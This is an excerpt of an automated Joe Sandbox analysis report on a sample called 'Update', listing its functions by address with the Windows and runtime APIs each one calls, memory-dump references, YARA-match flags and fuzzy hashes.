LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?), ref: 6CAB3ED0

Strings

api-ms-, xrefs: 6CAB3EB5

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 1ae3f6110644f0a269bd59f5257b72172f3f7a00206fd7657e9ab946ac39f8cd
Instruction ID: bb0222692d6fd0ef21f463cca7c83a14eb370d044733ab9b42e9438ebceda852
Opcode Fuzzy Hash: 1ae3f6110644f0a269bd59f5257b72172f3f7a00206fd7657e9ab946ac39f8cd
Instruction Fuzzy Hash: 69E04F31385309BBEF051EA2DC0AB593BBDAB01B45F248421FA4CF9990DB71F6A1D754

Function 037FD830 Relevance: 6.4, APIs: 5, Instructions: 140COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014), ref: 037FD868
IsBadReadPtr.KERNEL32(?,00000014), ref: 037FD938
SetLastError.KERNEL32(0000007F), ref: 037FD963

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Read$ErrorLast
String ID:
API String ID: 2715074504-0
Opcode ID: ffe32ce8a60d820e79a0e1d7296aab46fcc1b1f8490919563c90442f6d79b20f
Instruction ID: cfa6b5a92fd2ed184ab580d16b1511a887f1f7d206991e44edce25527ddf814e
Opcode Fuzzy Hash: ffe32ce8a60d820e79a0e1d7296aab46fcc1b1f8490919563c90442f6d79b20f
Instruction Fuzzy Hash: A5419B71A00209AFDB20CFA9D880B6AF3F9FF88314F148599E95997354D774F901CB90

Function 6CAB15C6 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(9AFB9AC3,00000000,00000000,?), ref: 6CAB1629

Part of subcall function 6CAAA751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CAAD550,?,00000000,-00000008), ref: 6CAAA7B2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CAB187B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CAB18C1
GetLastError.KERNEL32 ref: 6CAB1964

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 6922418293e99df35a29574f1c440b0651b419904b0663d9e0939de47d6ccfba
Instruction ID: d57c95356d964ef4c89efef4e6b29e6e0f43e885d17f88dcd9adb9a28bdc6fdd
Opcode Fuzzy Hash: 6922418293e99df35a29574f1c440b0651b419904b0663d9e0939de47d6ccfba
Instruction Fuzzy Hash: C8D15A75E042899FCB05CFE8C8809EDBBB9FF09314F28456AE565BB741D630E986CB50

Function 6CAA99CA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6CAA9A91
___AdjustPointer.LIBCMT ref: 6CAA9AB4
___AdjustPointer.LIBCMT ref: 6CAA9B50

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c81c34666e451196e31115adead93acfa6ac57fb1d4971ee0f112e7f8b9887fb
Instruction ID: 0d2919be66c3937e17bac5fc7bf213b67cd579ebc3738e8e6dea0060778986e3
Opcode Fuzzy Hash: c81c34666e451196e31115adead93acfa6ac57fb1d4971ee0f112e7f8b9887fb
Instruction Fuzzy Hash: EB51E671606606AFDB159FA4CB81BAA77B4EF45308F24452ED81547A90E732D8CBC790

Function 6CA85280 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6CA852FB
Concurrency::cancel_current_task.LIBCPMT ref: 6CA853A7
Concurrency::cancel_current_task.LIBCPMT ref: 6CA853B3
Concurrency::cancel_current_task.LIBCPMT ref: 6CA853BF

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Concurrency::cancel_current_task$_strlen
String ID:
API String ID: 3047427315-0
Opcode ID: 0ef88f72077c1bd6bd391a7d943bc2c48525449375c985df631a4a534caeb399
Instruction ID: 16ecd58b62e3e4a28845e0dc353e1320a4660741fc9c31d9e32de4e3ff27fac4
Opcode Fuzzy Hash: 0ef88f72077c1bd6bd391a7d943bc2c48525449375c985df631a4a534caeb399
Instruction Fuzzy Hash: 2C41CFB1C017488FEB10CFA4D9457AEBBF4AF05318F084529D9565BB80E7B5D68CCBA1

Function 0380A5C2 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0380A5F6
__isleadbyte_l.LIBCMT ref: 0380A629
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0380A65A
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0380A6C8

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: bb2bfc39d16de7b9575330f05a955cfd8d150c0136d4ecf81a81e1c92cebc444
Instruction ID: beee0978e9018193b05fb10aa5d20a3748e15b5fb3785b7d01725e5780efbeec
Opcode Fuzzy Hash: bb2bfc39d16de7b9575330f05a955cfd8d150c0136d4ecf81a81e1c92cebc444
Instruction Fuzzy Hash: 67318731A00346AFDB68DFE4CC909BE7BB9BB02210F0885E9E461CB1E0E734D980CB50

Function 6CA84E70 Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6CA84EA5
std::_Lockit::_Lockit.LIBCPMT ref: 6CA84EC2
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84EE3
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84F79

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: af3d7d6a9351bb98fa3996d6381d884540a86e5923f3cb90344211481dac3c83
Instruction ID: 6952604c4b7b0059a215ca4f55a4ccc6e33d3da47237e0b77212b483dcb0f56a
Opcode Fuzzy Hash: af3d7d6a9351bb98fa3996d6381d884540a86e5923f3cb90344211481dac3c83
Instruction Fuzzy Hash: E8417B71D012198FCB14EF94D954BDEB7B4FF08728F088229E815AB750E735AD89CBA0

Function 1000E425 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000E459
__isleadbyte_l.LIBCMT ref: 1000E48C
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 1000E4BD
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 1000E52B

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: faff6b0e24b146ed5f76b5f803dc00f384076012b6a75b333959b6e0697892ea
Instruction ID: 678bb179593d23e830fa626ca8f93fbb1acc7737e5ff7f739f33e090e4c13c79
Opcode Fuzzy Hash: faff6b0e24b146ed5f76b5f803dc00f384076012b6a75b333959b6e0697892ea
Instruction Fuzzy Hash: 9731AE71A042D6EFEB10CFA4C884AAD3BE6EF013D1B1585A9E4A4AB099D730DD40DB51

Function 6CA82EB0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6CA82EE5
std::_Lockit::_Lockit.LIBCPMT ref: 6CA82EFF
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA82F20
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA82FF5

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: 0869ac0764358e08338cdcd9d90fab7aab3259942dc74436709e29cba08029e7
Instruction ID: ba8389c03dab6204bd862b7c168c0ed8e0b3629b8724a87bb3a2a59b93a313e0
Opcode Fuzzy Hash: 0869ac0764358e08338cdcd9d90fab7aab3259942dc74436709e29cba08029e7
Instruction Fuzzy Hash: 6B416971E012158FCB14DF98C545BAEB7F1FF48718F088219D859ABB90DB34AE89CB90

Function 6CA8CB70 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6CA8CBA5
std::_Lockit::_Lockit.LIBCPMT ref: 6CA8CBBF
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA8CBE0
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA8CCB5

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: fcecfa4dfcb7c3f92837215604191c47333b3c6ff0b65918c69430de6dc428a1
Instruction ID: 83dab1db873727308860e6fb74c2fa43f9fd271357b3a287302d4ac0c0c36b9d
Opcode Fuzzy Hash: fcecfa4dfcb7c3f92837215604191c47333b3c6ff0b65918c69430de6dc428a1
Instruction Fuzzy Hash: 34416AB5E012198FCB14EF98C545B9EB7F1FF48B18F088219D859ABB50D734A989CF90

Function 6CA8B4E0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6CA8B515
std::_Lockit::_Lockit.LIBCPMT ref: 6CA8B52F
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA8B550
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA8B625

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: 4b369e11cefa9bc53416c13825507f15268cbb7075740ff9025095ed2329590d
Instruction ID: dfe589d7bb1dd34bee3c66c7dfd664645b8ae1b6998b7395173009a50a1cfbbd
Opcode Fuzzy Hash: 4b369e11cefa9bc53416c13825507f15268cbb7075740ff9025095ed2329590d
Instruction Fuzzy Hash: DE418BB1E012198FCB18DF94D951BDEB7F1FB44718F088229D455AB780DB30A989CB90

Function 00C74407 Relevance: 6.1, APIs: 4, Instructions: 93synchronizationtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C74425
InterlockedExchange.KERNEL32(?,00000000), ref: 00C74434
WaitForSingleObject.KERNEL32(?,00001770), ref: 00C74482

Part of subcall function 00C73F37: GetCurrentThreadId.KERNEL32 ref: 00C73F3C
Part of subcall function 00C73F37: send.WS2_32(?,10017440,00000010,00000000), ref: 00C73F9D
Part of subcall function 00C73F37: SetEvent.KERNEL32(?), ref: 00C73FC0
Part of subcall function 00C73F37: InterlockedExchange.KERNEL32(?,00000000), ref: 00C73FCC
Part of subcall function 00C73F37: WSACloseEvent.WS2_32(?), ref: 00C73FDA
Part of subcall function 00C73F37: shutdown.WS2_32(?,00000001), ref: 00C73FF2
Part of subcall function 00C73F37: closesocket.WS2_32(?), ref: 00C73FFC

Memory Dump Source

Source File: 00000003.00000002.3509855269.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c70000_Update.jbxd

Similarity

API ID: EventExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
String ID:
API String ID: 4080316033-0
Opcode ID: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
Instruction ID: 471651b13fbf0c551cd5c52432290080bfc15ca4626c413b6259706e2eeaefc2
Opcode Fuzzy Hash: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
Instruction Fuzzy Hash: 3B218F76600704ABD220EFB9DC85B9BB3E8FF89711F004A0EF58AC7650D671E904DBA0

Function 037F8020 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 037F8038
_memset.LIBCMT ref: 037F8042
lstrlenW.KERNEL32(?), ref: 037F804B
lstrlenW.KERNEL32(?), ref: 037F8056

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: lstrlen$_memset
String ID:
API String ID: 2425037729-0
Opcode ID: 47eb5098d38fea4605040deaf1b9982e4a30916585e1a48116445b0cab4b7407
Instruction ID: b9f2a4b918652bce4ebdc25e58d41785eda547da32999051e3e36158b74179cd
Opcode Fuzzy Hash: 47eb5098d38fea4605040deaf1b9982e4a30916585e1a48116445b0cab4b7407
Instruction Fuzzy Hash: 1121D87670021DAFCB14DF58DC809BEB3A9FBC4720B69416DEE05C7301F731995186A2

Function 6CAAF665 Relevance: 6.1, APIs: 4, Instructions: 82COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CAAA751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CAAD550,?,00000000,-00000008), ref: 6CAAA7B2

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6CAAF6C9
__dosmaperr.LIBCMT ref: 6CAAF6D0
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6CAAF70A
__dosmaperr.LIBCMT ref: 6CAAF711

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 978514ca931513d51d5c47d1724847cefa48fc53c282eced93acba4f6b92bb72
Instruction ID: 3a2ebfe86283da325a354c7cbbcb0a62cea39a5aa90c95cd4e35453c78f3ea6e
Opcode Fuzzy Hash: 978514ca931513d51d5c47d1724847cefa48fc53c282eced93acba4f6b92bb72
Instruction Fuzzy Hash: 0921B371604245AF9B189FE6CD8099AB7B9FF053A8704861DF918D7E10E730ECD68B90

Function 6CA9F93F Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b472cd2c433b4fa2df36061b9e77c377b733b3a9bc7c13444644078893256b
Instruction ID: 4c6920384596c0b53d288c4519dc7bde068fef68b1fdbff59b08c8343ad0ad24
Opcode Fuzzy Hash: 89b472cd2c433b4fa2df36061b9e77c377b733b3a9bc7c13444644078893256b
Instruction Fuzzy Hash: 6C21CD32214216BF8B009FA68D8598B77E9EF05328718871DF919C7A00EB30EDE5C7A0

Function 6CAB0C88 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6CAB0C90

Part of subcall function 6CAAA751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CAAD550,?,00000000,-00000008), ref: 6CAAA7B2

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CAB0CC8
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CAB0CE8

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 7a232bb95051820df6dad08c0317d0cbf7580292233fc0e2176280392e57c949
Instruction ID: e63edeb7430cce1428a0ce88283705681ceb84d435949d684b6d96acc9d3f8e4
Opcode Fuzzy Hash: 7a232bb95051820df6dad08c0317d0cbf7580292233fc0e2176280392e57c949
Instruction Fuzzy Hash: 8A11E1F260165A7E670117B68E8CCEF7AADCF4A29D3144114F901E2640FF70EECA8A71

Function 6CA907B0 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,-00000A64,?,00000000,?,6CA90BAE,?), ref: 6CA907C6
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?), ref: 6CA90803
WideCharToMultiByte.KERNEL32 ref: 6CA90833
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 6CA90862

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 803d9d786172295d20d1efbf2ce021a01a1280ca0a8468f329ec7d7d97464b65
Instruction ID: f588e4267de550f8009074ded4d493f944dd8e8ae6312983639764fd870d4bfb
Opcode Fuzzy Hash: 803d9d786172295d20d1efbf2ce021a01a1280ca0a8468f329ec7d7d97464b65
Instruction Fuzzy Hash: 57115E71B043053BF7105B719C0AF5B7AECDB82778F104315F6289A2D0EB71694C86A2

Function 037F4380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F), ref: 037F43EC

Part of subcall function 037F13A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 037F13CB

Part of subcall function 037F41E0: EnterCriticalSection.KERNEL32(037F4FB5,037F4E55,037F42BE,00000000,?,?,037F4E55,?,?,?,?,00000000,000000FF), ref: 037F41E8
Part of subcall function 037F41E0: LeaveCriticalSection.KERNEL32(037F4FB5,?,?,?,00000000,000000FF), ref: 037F41F6

Part of subcall function 037F4C70: HeapFree.KERNEL32(?,00000000,?,00000000,037F4E55,?,037F42C8,037F4E55,00000000,?,?,037F4E55,?), ref: 037F4C97

SetLastError.KERNEL32(00000000,?), ref: 037F43D7
SetLastError.KERNEL32(00000057), ref: 037F4401
WSAGetLastError.WS2_32(?), ref: 037F4410

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
String ID:
API String ID: 2060118545-0
Opcode ID: 60eea161baedb74cb494c71cc3d51cf330b68868eb1e064c5ce8add9b349c51f
Instruction ID: d313225225fbdd62550c589539f6c362c333c8e636090810de831d037c619cb3
Opcode Fuzzy Hash: 60eea161baedb74cb494c71cc3d51cf330b68868eb1e064c5ce8add9b349c51f
Instruction Fuzzy Hash: 7611A33AA055189BCB10EE7AF88459FF7A8FF88232B4805AAED0CE7300D735990186D1

Function 10004380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F), ref: 100043EC

Part of subcall function 100013A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 100013CB

Part of subcall function 10004C50: HeapFree.KERNEL32(?,00000000,?,00000000,10004E35,?,100042C8,10004E35,00000000,?,00000001,10004E35,?), ref: 10004C77

SetLastError.KERNEL32(00000000,?), ref: 100043D7
SetLastError.KERNEL32(00000057), ref: 10004401
WSAGetLastError.WS2_32(?), ref: 10004410

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: ErrorLast$Heap$AllocFree
String ID:
API String ID: 1906775185-0
Opcode ID: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
Instruction ID: af902972c3ae3a33560ac4961c645c5895ff77c926fb996934c7b8e77325769a
Opcode Fuzzy Hash: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
Instruction Fuzzy Hash: CA11CA76B055289BE700DFA9E8845DEB7A8EF883B2B0541B6FD0CD7204DA35DD0546D4

Function 037FDE70 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 037FDE93
_free.LIBCMT ref: 037FDED5
GetProcessHeap.KERNEL32(00000000,00000000,037FDC95), ref: 037FDEFC
